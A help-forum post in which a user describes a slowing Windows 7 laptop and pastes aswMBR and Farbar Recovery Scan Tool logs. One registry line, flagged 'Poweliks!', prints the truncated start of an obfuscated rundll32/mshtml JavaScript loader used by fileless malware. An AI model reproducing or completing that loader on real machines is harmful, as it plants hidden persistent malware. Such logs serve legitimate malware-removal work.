
Thread: Slow laptop, Spybot and Malwarebytes have not found the issue

  1. #1
    Junior Member (Join Date: Dec 2014, Posts: 6)

    Slow laptop, Spybot and Malwarebytes have not found the issue

    Hi, I noticed sudden slow performance on my laptop at the end of last week. I have tried Malwarebytes, which has not found the threat. I remembered using Spybot years ago and have run numerous scans. The Spybot scans find items, but the issue still starts again. Typically the laptop is fine for 20-30 minutes, then gets to a very slow speed regardless of what I am working on (email, Excel or internet).

    Thanks

    aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
    Run date: 2014-12-17 10:39:19
    -----------------------------
    10:39:19.607 OS Version: Windows x64 6.1.7601 Service Pack 1
    10:39:19.607 Number of processors: 4 586 0x2A07
    10:39:19.607 ComputerName: GLUSKID-LT UserName: gluskid
    10:39:25.141 Initialize success
    10:39:25.416 VM: initialized successfully
    10:39:25.418 VM: Intel CPU supported
    10:40:38.578 VM: disk I/O iaStorA.sys
    10:50:08.187 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000062
    10:50:08.208 Disk 0 Vendor: WDC_____ 01.0 Size: 305245MB BusType: 11
    10:50:08.304 Disk 0 MBR read successfully
    10:50:08.307 Disk 0 MBR scan
    10:50:08.309 Disk 0 Windows 7 default MBR code
    10:50:08.323 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 499 MB offset 2048
    10:50:08.332 Disk 0 default boot code
    10:50:08.335 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 304744 MB offset 1024000
    10:50:08.366 Disk 0 scanning C:\windows\system32\drivers
    10:50:14.118 Service scanning
    10:50:37.264 Modules scanning
    10:50:37.275 Disk 0 trace - called modules:
    10:50:37.324 ntoskrnl.exe CLASSPNP.SYS disk.sys stdcfltn.sys iaStorF.sys ACPI.sys storport.sys hal.dll iaStorA.sys
    10:50:37.350 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004725060]
    10:50:37.350 3 CLASSPNP.SYS[fffff88000e5743f] -> nt!IofCallDriver -> [0xfffffa80045ce8c0]
    10:50:37.360 5 stdcfltn.sys[fffff88001de4d12] -> nt!IofCallDriver -> [0xfffffa80045cec50]
    10:50:37.380 7 iaStorF.sys[fffff88001df5f84] -> nt!IofCallDriver -> [0xfffffa80045bae40]
    10:50:37.390 9 ACPI.sys[fffff88000f6e7a1] -> nt!IofCallDriver -> \Device\00000062[0xfffffa80046939c0]
    10:50:37.410 Disk 0 statistics 91937/0/0 @ 10.49 MB/s
    10:50:37.420 Scan finished successfully
    10:52:04.316 Disk 0 MBR has been saved successfully to "C:\Users\gluskid\Desktop\MBR.dat"
    10:52:04.316 The log file has been saved successfully to "C:\Users\gluskid\Desktop\aswMBR.txt"


    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 14-12-2014 01
    Ran by gluskid (administrator) on GLUSKID-LT on 17-12-2014 10:29:18
    Running from C:\Users\gluskid\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2PB313KY
    Loaded Profiles: gluskid & Administrator (Available profiles: gluskid & Administrator)
    Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
    Internet Explorer Version 11
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SavService.exe
    (Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect VPN Client\vpnagent.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFManager.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFService.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\agentmonitor.exe
    () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\aeagent.exe
    () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentservice.exe
    () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcondemand.exe
    () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcswmeter.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SAVAdminService.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\Remote Management System\ManagementAgentNT.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\AutoUpdate\ALsvc.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\Remote Management System\RouterNT.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Control\swc_service.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Intelligence\swi_service.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
    (Greenshot) C:\Program Files\Greenshot\Greenshot.exe
    (Intel Corporation) C:\Windows\System32\igfxtray.exe
    (Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation) C:\Windows\System32\igfxpers.exe
    () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagenttrayicon.exe
    (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    (WinZip Computing, S.L.) C:\Program Files (x86)\WinZip\WZQKPICK.EXE
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
    (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
    (Sophos Limited) C:\Program Files (x86)\Sophos\AutoUpdate\ALMon.exe
    (Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWelcome.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
    (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe


    ==================== Registry (Whitelisted) ==================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [495616 2013-12-12] (Greenshot)
    HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2014-05-08] (Adobe Systems Incorporated)
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
    HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [162856 2013-06-10] (Geek Software GmbH)
    HKLM-x32\...\Run: [Sophos AutoUpdate Monitor] => C:\Program Files (x86)\Sophos\AutoUpdate\almon.exe [1617704 2014-09-18] (Sophos Limited)
    HKLM-x32\...\Run: [] => [X]
    HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [36760 2010-10-25] (Adobe Systems Incorporated)
    HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [821144 2010-10-25] (Adobe Systems Inc.)
    HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
    Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer\DisallowRun: [1] mozilla.exe
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer\DisallowRun: [2] netscape.exe
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer: [DisallowRun] 1
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
    AppInit_DLLs: C:\PROGRA~2\Sophos\SOPHOS~1\SOPHOS~2.DLL => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\sophos_detoured_x64.dll [217160 2014-11-03] (Sophos Limited)
    AppInit_DLLs-x32: C:\PROGRA~2\Sophos\SOPHOS~1\SOPHOS~1.DLL => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\sophos_detoured.dll [275352 2014-11-03] (Sophos Limited)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ManageEngine Desktop Central Agent.lnk
    ShortcutTarget: ManageEngine Desktop Central Agent.lnk -> C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagenttrayicon.exe ()
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
    ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files (x86)\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
    BootExecute: autocheck autochk * sdnclean64.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    HKU\PE_C_SHIRKR\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
    HKU\S-1-5-21-975400410-3068043782-3249626173-500\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    SearchScopes: HKU\PE_C_SHIRKR -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
    BHO: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli64.dll (Cisco WebEx LLC)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
    BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
    BHO-x32: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
    BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
    BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
    Toolbar: HKLM - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli64.dll (Cisco WebEx LLC)
    Toolbar: HKLM-x32 - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
    Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
    DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/W...x/ieatgpc1.cab
    Winsock: Catalog9 01 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 02 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 03 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 04 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 05 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 06 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 07 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 08 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9 19 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
    Winsock: Catalog9-x64 01 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 02 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 03 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 04 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 05 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 06 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 07 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 08 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Winsock: Catalog9-x64 19 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
    Tcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75

    FireFox:
    ========
    FF ProfilePath: C:\Users\gluskid\AppData\Roaming\Mozilla\Firefox\Profiles\82heu55g.default
    FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll ()
    FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
    FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
    FF HKLM-x32\...\Firefox\Extensions: [ocplugin@webex.com] - C:\Program Files (x86)\WebEx\Productivity Tools
    FF Extension: ocplugin - C:\Program Files (x86)\WebEx\Productivity Tools [2014-11-03]
    FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
    FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2014-11-03]

    Chrome:
    =======
    CHR Profile: C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Google Slides) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-11-03]
    CHR Extension: (Google Docs) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-03]
    CHR Extension: (Google Drive) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-03]
    CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-03]
    CHR Extension: (YouTube) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-03]
    CHR Extension: (Google Search) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-03]
    CHR Extension: (Google Sheets) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-11-03]
    CHR Extension: (Google Wallet) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-03]
    CHR Extension: (Gmail) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-03]

    ==================== Services (Whitelisted) =================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R2 ManageEngine AssetExplorer Agent; C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\agentmonitor.exe [598016 2012-06-28] () [File not signed]
    S3 ManageEngine AssetExplorer RemoteControl; C:\Program Files (x86)\ManageEngine\AssetExplorer\\RemoteControl\Service.exe [2166784 2012-06-28] () [File not signed]
    R2 ManageEngine Desktop Central - Agent; C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentservice.exe [556392 2014-05-16] ()
    S3 ManageEngine Desktop Central - Remote Control; C:\Program Files (x86)\DesktopCentral_Agent\bin\dcrdservice.exe [613736 2014-05-16] ()
    S4 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
    R2 SAVAdminService; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SAVAdminService.exe [288552 2014-11-03] (Sophos Limited)
    R2 SAVService; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SavService.exe [208168 2014-11-03] (Sophos Limited)
    R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1740760 2014-09-03] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
    R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
    R2 Sophos Agent; C:\Program Files (x86)\Sophos\Remote Management System\ManagementAgentNT.exe [289856 2014-11-03] (Sophos Limited)
    R2 Sophos AutoUpdate Service; C:\Program Files (x86)\Sophos\AutoUpdate\ALsvc.exe [341800 2014-09-18] (Sophos Limited)
    R2 Sophos Client Firewall; C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFService.exe [64808 2014-11-03] (Sophos Limited)
    R2 Sophos Client Firewall Manager; C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFManager.exe [158504 2014-11-03] (Sophos Limited)
    R2 Sophos Message Router; C:\Program Files (x86)\Sophos\Remote Management System\RouterNT.exe [818240 2014-11-03] (Sophos Limited)
    R2 Sophos Web Control Service; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Control\swc_service.exe [341800 2014-11-03] (Sophos Limited)
    R2 swi_service; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Intelligence\swi_service.exe [3262248 2014-11-03] (Sophos Limited)
    S2 swi_update_64; C:\ProgramData\Sophos\Web Intelligence\swi_update_64.exe [2065704 2014-11-03] (Sophos Limited)

    ==================== Drivers (Whitelisted) ====================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36096 2014-08-19] (Advanced Micro Devices, Inc.)
    R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-07-03] (Intel Corporation)
    R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-11-21] (Malwarebytes Corporation)
    S3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-12-17] (Malwarebytes Corporation)
    S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-11-21] (Malwarebytes Corporation)
    R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [118272 2014-08-19] (Intel Corporation)
    R1 SAVOnAccess; C:\Windows\System32\DRIVERS\savonaccess.sys [158976 2014-11-03] (Sophos Limited)
    R1 scfdriver; C:\windows\system32\Drivers\scfdriver.sys [102688 2014-11-03] (Sophos Limited)
    R1 scfndis; C:\Windows\System32\DRIVERS\scfndis.sys [55072 2014-11-03] (Sophos Limited)
    S3 sdcfilter; C:\Windows\System32\DRIVERS\sdcfilter.sys [38144 2014-11-03] (Sophos Limited)
    S4 SophosBootDriver; C:\Windows\System32\DRIVERS\SophosBootDriver.sys [27904 2014-11-03] (Sophos Limited)
    R3 ST_Accel; C:\Windows\System32\DRIVERS\ST_Accel.sys [89312 2014-06-25] (STMicroelectronics)

    ==================== NetSvcs (Whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


    ==================== One Month Created Files and Folders ========

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2014-12-17 10:29 - 2014-12-17 10:29 - 00000000 ____D () C:\FRST
    2014-12-17 08:51 - 2014-12-17 08:51 - 00003288 ____N () C:\bootsqm.dat
    2014-12-17 08:37 - 2014-12-17 08:37 - 00050679 _____ () C:\Users\gluskid\Desktop\Jan Feb 2014 ALG Residuals 14 MY Only.xlsx
    2014-12-16 22:36 - 2014-12-16 22:36 - 00000000 ____D () C:\Users\gluskid\AppData\Roaming\Mozilla
    2014-12-16 22:36 - 2014-12-16 22:36 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Mozilla
    2014-12-16 15:05 - 2014-12-16 15:05 - 00179554 _____ () C:\Users\gluskid\Documents\Copy of 2015MY Market Basket Summary - Retail Incentive Programs - Autodata 1216514.xlsx
    2014-12-16 13:42 - 2014-12-16 13:42 - 00000000 ____D () C:\Users\gluskid\Documents\ProcAlyzer Dumps
    2014-12-15 15:40 - 2014-12-15 15:40 - 00000000 ____D () C:\windows\System32\Tasks\Safer-Networking
    2014-12-15 15:16 - 2014-12-15 15:16 - 00000000 ____D () C:\USB
    2014-12-15 14:52 - 2009-06-10 16:00 - 00000824 _____ () C:\windows\system32\Drivers\etc\hosts.20141215-145251.backup
    2014-12-15 10:47 - 2014-12-15 10:47 - 00000000 ____D () C:\ProgramData\IsolatedStorage
    2014-12-15 10:16 - 2014-12-15 10:16 - 00001829 _____ () C:\Users\gluskid\Documents\bot_data_for_ip_1418656388860_98.243.26.173.csv
    2014-12-15 08:10 - 2012-12-15 19:38 - 00333496 _____ (Hewlett-Packard Co.) C:\windows\system32\hpinkstsC511LM.dll
    2014-12-15 08:10 - 2012-12-15 19:38 - 00272056 _____ (Hewlett-Packard Co.) C:\windows\system32\hpinkcoiC511.dll
    2014-12-15 08:10 - 2012-12-15 18:36 - 02878648 _____ (Hewlett-Packard Co.) C:\windows\system32\hpinkinsC511.exe
    2014-12-15 00:02 - 2014-12-15 09:00 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
    2014-12-15 00:02 - 2014-12-15 08:59 - 00000630 _____ () C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
    2014-12-15 00:02 - 2014-12-15 08:59 - 00000460 _____ () C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job
    2014-12-15 00:02 - 2014-12-15 08:55 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
    2014-12-15 00:02 - 2014-12-15 00:02 - 00001401 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
    2014-12-15 00:02 - 2014-12-15 00:02 - 00001389 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
    2014-12-15 00:02 - 2014-12-15 00:02 - 00000656 _____ () C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job
    2014-12-15 00:02 - 2014-12-15 00:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
    2014-12-15 00:02 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\windows\system32\sdnclean64.exe
    2014-12-12 15:28 - 2014-12-17 08:09 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
    2014-12-12 15:27 - 2014-12-12 15:27 - 00001112 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2014-12-12 15:27 - 2014-12-12 15:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2014-12-12 15:27 - 2014-12-12 15:27 - 00000000 ____D () C:\ProgramData\Malwarebytes
    2014-12-12 15:27 - 2014-12-12 15:27 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
    2014-12-12 15:27 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
    2014-12-12 15:27 - 2014-11-21 06:14 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
    2014-12-12 15:27 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
    2014-12-11 09:56 - 2014-12-11 09:56 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Sophos
    2014-12-10 15:14 - 2014-12-10 15:15 - 00014197 _____ () C:\Users\gluskid\Desktop\Executive Definitions CHANGES.xlsx
    2014-12-09 12:02 - 2014-12-09 12:02 - 00013815 _____ () C:\Users\gluskid\Desktop\Chrysler - Current MSRP File Totals 12 - 15.xlsx
    2014-12-02 12:10 - 2014-12-02 12:10 - 00419748 _____ () C:\Users\gluskid\Desktop\December 2014 National Color Chart With Regionals V2.xlsx
    2014-11-24 15:38 - 2014-11-24 15:38 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Hewlett-Packard
    2014-11-24 15:34 - 2014-11-24 15:34 - 00000000 ____D () C:\Program Files (x86)\Hp
